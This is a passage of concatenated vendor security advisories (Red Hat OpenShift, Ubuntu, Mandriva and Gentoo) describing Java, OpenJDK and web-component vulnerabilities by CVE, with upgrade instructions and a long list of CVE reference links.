c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3FJJxAA hLu4GEYEBPNLxDWhh49P7k7pe33N8cguJw2iPt6sYkF9swBwzL1AC1y0WiNJejGT Y0PPMG7evpaEVGQwCZvHarNT4g35OUeHdHy4gYAIPfTY15G25jmELL4YTJutWQ0O z6KseXhEq9EqpHKlsT5Q6QOEoUyXVHan33d+H9+4t/jQHFvDqMmwHWO7bKlYyhWW ctG8jbXSgy/OFjSrmbPhfbBfDXQHah8GsFGJAFtlWk+UtQhXNifJT1tj9XAKDtGK V5EQ/hYkYRyyeNPXLiZ/wn6Jesbg8QIrmZB2RHAl1w8XZZY2Gsd1//dTXqn1LkqK gwOV0+Vs//LJwIqix435KKc0ULMwJjIfKy9whzPyf+4lqcD4kx4OdQrakZz4+L7g 4ZZeeyJ0LFFnO4eavtn6lVrYcTXVhJlRkJ6cWZcf9Dfr28bPTSSHda1Nd9quZFJn QPFt7CHRPL1MelgfDKZNeTy7WUDnoTwbdMZCyd0MszCxCeaSahny7066jmfKyXGI OoQQyyz96OmBABcqG3WeCRSeJ3ymmoy2d+JzjA4boIHo4k+nq5ifKikyI8qiHIBB uS3K3DEzMSj/0u2vNcDMjQ6vogbxeWnK8fxCCxkfedYZEdHg4Oj4lK1HStbhweoJ cB3S2pWUIPt8HRcnbUYgypZ0ZJgtnTom+0mgi3a0+64= =fsAj -----END PGP SIGNATURE----- . Description: Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. Security Fix(es): * golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic (CVE-2020-9283) * SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169) * grafana: XSS vulnerability via a column style on the "Dashboard > Table Panel" screen (CVE-2018-18624) * js-jquery: prototype pollution in object's prototype leading to denial of service or remote code execution or property injection (CVE-2019-11358) * npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions (CVE-2019-16769) * kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) (CVE-2020-7013) * nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload (CVE-2020-7598) * npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser (CVE-2020-7662) * nodejs-lodash: prototype pollution in zipObjectDeep function (CVE-2020-8203) * jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method (CVE-2020-11022) * jQuery: passing HTML containing <option> elements to manipulation methods could result in untrusted code execution (CVE-2020-11023) * grafana: stored XSS (CVE-2020-11110) * grafana: XSS annotation popup vulnerability (CVE-2020-12052) * grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245) * nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures (CVE-2020-13822) * golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash (CVE-2020-14040) * nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366) * openshift/console: text injection on error page via crafted url (CVE-2020-10715) * kibana: X-Frame-Option not set by default might lead to clickjacking (CVE-2020-10743) * openshift: restricted SCC allows pods to craft custom network packets (CVE-2020-14336) For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution: For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update: https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel ease-notes.html Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/): 907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13) 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1767665 - CVE-2020-10715 openshift/console: text injection on error page via crafted url 1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1813344 - CVE-2020-7598 nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1834550 - CVE-2020-10743 kibana: X-Frame-Option not set by default might lead to clickjacking 1845982 - CVE-2020-7662 npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser 1848089 - CVE-2020-12052 grafana: XSS annotation popup vulnerability 1848092 - CVE-2019-16769 npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions 1848643 - CVE-2020-12245 grafana: XSS via column.title or cellLinkTooltip 1848647 - CVE-2020-13822 nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures 1849044 - CVE-2020-7013 kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06) 1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution 1850572 - CVE-2018-18624 grafana: XSS vulnerability via a column style on the "Dashboard > Table Panel" screen 1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash 1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function 1857977 - CVE-2020-15366 nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function 1858981 - CVE-2020-14336 openshift: restricted SCC allows pods to craft custom network packets 1861044 - CVE-2020-11110 grafana: stored XSS 1874671 - CVE-2020-14336 ose-machine-config-operator-container: openshift: restricted SCC allows pods to craft custom network packets [openshift-4] 5
var-201302-0404 Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE 7 Update 13 and earlier and 6 Update 39 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment. (DoS) An attack may be carried out. The vulnerability can be exploited over multiple protocols. This issue affects the 'Deployment' sub-component. This vulnerability affects the following supported versions: 7 Update 13 and prior 6 Update 39 and prior. ============================================================================ Ubuntu Security Notice USN-1735-1 February 21, 2013 openjdk-6, openjdk-7 vulnerabilities ============================================================================ A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.10 - Ubuntu 12.04 LTS - Ubuntu 11.10 - Ubuntu 10.04 LTS Summary: Several security issues were fixed in OpenJDK. Software Description: - openjdk-7: Open Source Java implementation - openjdk-6: Open Source Java implementation Details: Nadhem Alfardan and Kenny Paterson discovered that the TLS protocol as used in OpenSSL was vulnerable to a timing side-channel attack known as the "Lucky Thirteen" issue. A remote attacker could use this issue to perform plaintext-recovery attacks via analysis of timing data. (CVE-2013-0169) A vulnerability was discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit this to cause a denial of service. This issue only affected Ubuntu 12.10. (CVE-2013-1484) A data integrity vulnerability was discovered in the OpenJDK JRE. This issue only affected Ubuntu 12.10. (CVE-2013-1485) Two vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to cause a denial of service. (CVE-2013-1486, CVE-2013-1487) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.10: icedtea-7-jre-cacao 7u15-2.3.7-0ubuntu1~12.10 icedtea-7-jre-jamvm 7u15-2.3.7-0ubuntu1~12.10 openjdk-7-jre 7u15-2.3.7-0ubuntu1~12.10 openjdk-7-jre-headless 7u15-2.3.7-0ubuntu1~12.10 openjdk-7-jre-lib 7u15-2.3.7-0ubuntu1~12.10 openjdk-7-jre-zero 7u15-2.3.7-0ubuntu1~12.10 Ubuntu 12.04 LTS: icedtea-6-jre-cacao 6b27-1.12.3-0ubuntu1~12.04 icedtea-6-jre-jamvm 6b27-1.12.3-0ubuntu1~12.04 openjdk-6-jre 6b27-1.12.3-0ubuntu1~12.04 openjdk-6-jre-headless 6b27-1.12.3-0ubuntu1~12.04 openjdk-6-jre-lib 6b27-1.12.3-0ubuntu1~12.04 openjdk-6-jre-zero 6b27-1.12.3-0ubuntu1~12.04 Ubuntu 11.10: icedtea-6-jre-cacao 6b27-1.12.3-0ubuntu1~11.10 icedtea-6-jre-jamvm 6b27-1.12.3-0ubuntu1~11.10 openjdk-6-jre 6b27-1.12.3-0ubuntu1~11.10 openjdk-6-jre-headless 6b27-1.12.3-0ubuntu1~11.10 openjdk-6-jre-lib 6b27-1.12.3-0ubuntu1~11.10 openjdk-6-jre-zero 6b27-1.12.3-0ubuntu1~11.10 Ubuntu 10.04 LTS: icedtea-6-jre-cacao 6b27-1.12.3-0ubuntu1~10.04 openjdk-6-jre 6b27-1.12.3-0ubuntu1~10.04 openjdk-6-jre-headless 6b27-1.12.3-0ubuntu1~10.04 openjdk-6-jre-lib 6b27-1.12.3-0ubuntu1~10.04 openjdk-6-jre-zero 6b27-1.12.3-0ubuntu1~10.04 This update uses a new upstream release which includes additional bug fixes. After a standard system update you need to restart any Java applications or applets to make all the necessary changes. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2013:014 http://www.mandriva.com/security/ _______________________________________________________________________ Package : java-1.6.0-openjdk Date : February 22, 2013 Affected: 2011., Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Multiple security issues were identified and fixed in OpenJDK (icedtea6): * S8006446: Restrict MBeanServer access * S8006777: Improve TLS handling of invalid messages * S8007688: Blacklist known bad certificate * S7123519: problems with certification path * S8007393: Possible race condition after JDK-6664509 * S8007611: logging behavior in applet changed The updated packages provides icedtea6-1.11.8 which is not vulnerable to these issues. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFRJ3F2mqjQ0CJFipgRAve3AKD19brDHUrIafN4QXGupxztDvVEgACggeN8 1+i8uSMYhYal8D4zQ/aF88s= =x4rn -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201401-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 27, 2014 Bugs: #404071, #421073, #433094, #438706, #451206, #455174, #458444, #460360, #466212, #473830, #473980, #488210, #498148 ID: 201401-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable! 2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 * 3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable! 4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 * 5 app-emulation/emul-linux-x86-java < 1.7.0.51 >= 1.7.0.51 * ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 5 affected packages Description =========== Multiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details. Impact ====== An unauthenticated, remote attacker could exploit these vulnerabilities to execute arbitrary code. Furthermore, a local or remote attacker could exploit these vulnerabilities to cause unspecified impact, possibly including remote execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All Oracle JDK 1.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51" All Oracle JRE 1.7 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51" All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51" All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea. References ========== [ 1 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 2 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 3 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 4 ] CVE-2012-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498 [ 5 ] CVE-2012-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499 [ 6 ] CVE-2012-0500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500 [ 7 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 8 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 9 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 10 ] CVE-2012-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504 [ 11 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 12 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 13 ] CVE-2012-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507 [ 14 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 15 ] CVE-2012-1531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531 [ 16 ] CVE-2012-1532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532 [ 17 ] CVE-2012-1533 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533 [ 18 ] CVE-2012-1541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541 [ 19 ] CVE-2012-1682 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682 [ 20 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 21 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 22 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 23 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 24 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 25 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 26 ] CVE-2012-1721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721 [ 27 ] CVE-2012-1722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722 [ 28 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 29 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 30 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 31 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 32 ] CVE-2012-3136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136 [ 33 ] CVE-2012-3143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143 [ 34 ] CVE-2012-3159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159 [ 35 ] CVE-2012-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174 [ 36 ] CVE-2012-3213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213 [ 37 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 38 ] CVE-2012-3342 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342 [ 39 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 40 ] CVE-2012-4681 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681 [ 41 ] CVE-2012-5067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067 [ 42 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 43 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 44 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 45 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 46 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 47 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 48 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 49 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 50 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 51 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 52 ] CVE-2012-5079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079 [ 53 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 54 ] CVE-2012-5083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083 [ 55 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 56 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 57 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 58 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 59 ] CVE-2012-5088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088 [ 60 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 61 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 62 ] CVE-2013-0351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351 [ 63 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 64 ] CVE-2013-0402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402 [ 65 ] CVE-2013-0409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409 [ 66 ] CVE-2013-0419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419 [ 67 ] CVE-2013-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422 [ 68 ] CVE-2013-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423 [ 69 ] CVE-2013-0430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430 [ 70 ] CVE-2013-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437 [ 71 ] CVE-2013-0438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438 [ 72 ] CVE-2013-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445 [ 73 ] CVE-2013-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446 [ 74 ] CVE-2013-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448 [ 75 ] CVE-2013-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449 [ 76 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 77 ] CVE-2013-1473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473 [ 78 ] CVE-2013-1479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479 [ 79 ] CVE-2013-1481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481 [ 80 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 81 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 82 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 83 ] CVE-2013-1487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487 [ 84 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 85 ] CVE-2013-1491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491 [ 86 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 87 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 88 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 89 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 90 ] CVE-2013-1540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540 [ 91 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 92 ] CVE-2013-1558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558 [ 93 ] CVE-2013-1561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561 [ 94 ] CVE-2013-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563 [ 95 ] CVE-2013-1564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564 [ 96 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 97 ] CVE-2013-1571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1571 [ 98 ] CVE-2013-2383 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2383 [ 99 ] CVE-2013-2384 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2384 [ 100 ] CVE-2013-2394 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2394 [ 101 ] CVE-2013-2400 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2400 [ 102 ] CVE-2013-2407 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2407 [ 103 ] CVE-2013-2412 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2412 [ 104 ] CVE-2013-2414 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2414 [ 105 ] CVE-2013-2415 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2415 [ 106 ] CVE-2013-2416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2416 [ 107 ] CVE-2013-2417 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2417 [ 108 ] CVE-2013-2418 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2418 [ 109 ] CVE-2013-2419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2419 [ 110 ] CVE-2013-2420 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2420 [ 111 ] CVE-2013-2421 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2421 [ 112 ] CVE-2013-2422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2422 [ 113 ] CVE-2013-2423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2423 [ 114 ] CVE-2013-2424 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2424 [ 115 ] CVE-2013-2425 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2425 [ 116 ] CVE-2013-2426 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2426 [ 117 ] CVE-2013-2427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2427 [ 118 ] CVE-2013-2428 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2428 [ 119 ] CVE-2013-2429 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2429 [ 120 ] CVE-2013-2430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2430 [ 121 ] CVE-2013-2431 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2431 [ 122 ] CVE-2013-2432 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2432 [ 123 ] CVE-2013-2433 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2433 [ 124 ] CVE-2013-2434 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2434 [ 125 ] CVE-2013-2435 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2435 [ 126 ] CVE-2013-2436 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2436 [ 127 ] CVE-2013-2437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2437 [ 128 ] CVE-2013-2438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2438 [ 129 ] CVE-2013-2439 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2439 [ 130 ] CVE-2013-2440 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2440 [ 131 ] CVE-2013-2442 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2442 [ 132 ] CVE-2013-2443 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2443 [ 133 ] CVE-2013-2444 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2444 [ 134 ] CVE-2013-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2445 [ 135 ] CVE-2013-2446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2446 [ 136 ] CVE-2013-2447 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2447 [ 137 ] CVE-2013-2448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2448 [ 138 ] CVE-2013-2449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2449 [ 139 ] CVE-2013-2450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2450 [ 140 ] CVE-2013-2451 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2451 [ 141 ] CVE-2013-2452 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2452 [ 142 ] CVE-2013-2453 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2453 [ 143 ] CVE-2013-2454 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2454 [ 144 ] CVE-2013-2455 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2455 [ 145 ] CVE-2013-2456 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2456 [ 146 ] CVE-2013-2457 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2457 [ 147 ] CVE-2013-2458 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2458 [ 148 ] CVE-2013-2459 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2459 [ 149 ] CVE-2013-2460 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2460 [ 150 ] CVE-2013-2461 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2461 [ 151 ] CVE-2013-2462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2462 [ 152 ] CVE-2013-2463 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2463 [ 153 ] CVE-2013-2464 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2464 [ 154 ] CVE-2013-2465 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2465 [ 155 ] CVE-2013-2466 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2466 [ 156 ] CVE-2013-2467 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2467 [ 157 ] CVE-2013-2468 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2468 [ 158 ] CVE-2013-2469 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2469 [ 159 ] CVE-2013-2470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2470 [ 160 ] CVE-2013-2471 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2471 [ 161 ] CVE-2013-2472 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2472 [ 162 ] CVE-2013-2473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2473 [ 163 ] CVE-2013-3743 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3743 [ 164 ] CVE-2013-3744 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3744 [ 165 ] CVE-2013-3829 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3829 [ 166 ] CVE-2013-5772 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5772 [ 167 ] CVE-2013-5774 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5774 [ 168 ] CVE-2013-5775 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-5775 [ 169 ] CVE-2013-5776 